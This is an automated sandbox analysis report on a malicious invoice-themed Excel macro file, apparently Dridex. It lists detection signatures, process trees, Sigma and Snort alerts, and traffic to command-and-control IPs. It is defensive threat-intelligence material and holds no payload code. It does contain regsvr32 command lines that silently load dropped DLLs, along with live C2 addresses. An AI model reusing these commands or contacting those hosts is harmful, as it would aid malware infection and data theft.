Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 1_Total New Invoices-Thursday January 21_2021.xlsm

Overview

General Information

Sample Name:1_Total New Invoices-Thursday January 21_2021.xlsm
Analysis ID:342716
MD5:a52a88ae97dd408d38d98c9aa7f81142
SHA1:234b65bc42a077c98c61a8eb4870d41e0039013e
SHA256:c7e6848fd63681514d6dad3032e358a257dde3aa1cd3b349306283356bca2608

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Abnormal high CPU Usage
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2432 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2440 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2328 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2692 cmdline: -s C:\Users\user\AppData\Local\Temp\kxwni.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 1980 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\uveoybvk.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2780 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2920 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2464 cmdline: -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 3036 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2964 cmdline: -s C:\Users\user\AppData\Local\Temp\nnmumzom.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2452 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jxacpz.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2496 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1236 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 912 cmdline: -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2852 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2828 cmdline: -s C:\Users\user\AppData\Local\Temp\sxzjqf.dll MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: BlueMashroom DLL LoadShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2432, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, ProcessId: 2440
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2432, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, ProcessId: 2440
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2432, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\kxwni.dll, ProcessId: 2440

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 1_Total New Invoices-Thursday January 21_2021.xlsmVirustotal: Detection: 27%Perma Link

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connectionShow sources
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49174 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49181 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49185 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49190 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49194 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49198 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49202 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49206 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49211 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49214 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49220 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49222 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49228 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49229 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49235 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49237 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49239 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49247 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49250 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49251 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49259 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49263 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49264 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49265 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49270 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49275 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49281 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49282 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49288 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49294 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49298 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49300 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49302 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49307 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49314 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49318 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49319 version: TLS 1.0
Source: unknownHTTPS traffic detected: 194.225.58.214:443 -> 192.168.2.22:49320 version: TLS 1.0
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Uses secure TLS version for HTTPS connectionsShow sources
Source: unknownHTTPS traffic detected: 64.37.52.172:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknownHTTPS traffic detected: 103.83.81.27:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknownHTTPS traffic detected: 198.136.54.91:443 -> 192.168.2.22:49184 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.224.50:443 -> 192.168.2.22:49191 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\kxwni.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\nnmumzom.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\sxzjqf.dllJump to behavior
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: l3v7tq4[1].rar.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
Source: global trafficDNS query: name: qsf.surfescape.net
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 64.37.52.172:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 64.37.52.172:443

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49170
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49171
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49173
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49173
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49174
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49175
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49176
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49178
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49179
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49179
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49181
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49182
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49183
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49183
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49185
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49187
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49188
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49188
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49190
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49193
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49193
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49192
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49194
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49196
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49197
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49197
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49198
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49200
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49201
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49201
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49202
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49204
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49205
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49205
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49206
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49207
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49209
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49209
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49211
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49212
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49212
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49213
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49214
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49215
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49218
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49218
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49219
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49219
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49220
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49222
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49221
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49223
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49226
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49226
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49227
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49227
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49228
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49229
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49230
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49231
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49234
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49234
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49235
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49237
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49236
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49236
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49238
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49239
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49240
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49241
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49244
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49244
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49246
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49246
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49247
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49248
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49248
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49250
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49249
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49251
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49252
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 211.110.44.63:5353 -> 192.168.2.22:49253
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49255
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49255
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 194.225.58.214:443 -> 192.168.2.22:49259
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49258
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49258
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49260
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49260
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49261
Source: TrafficSnort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 198.57.200.100:3786 -> 192.168.2.22:49261
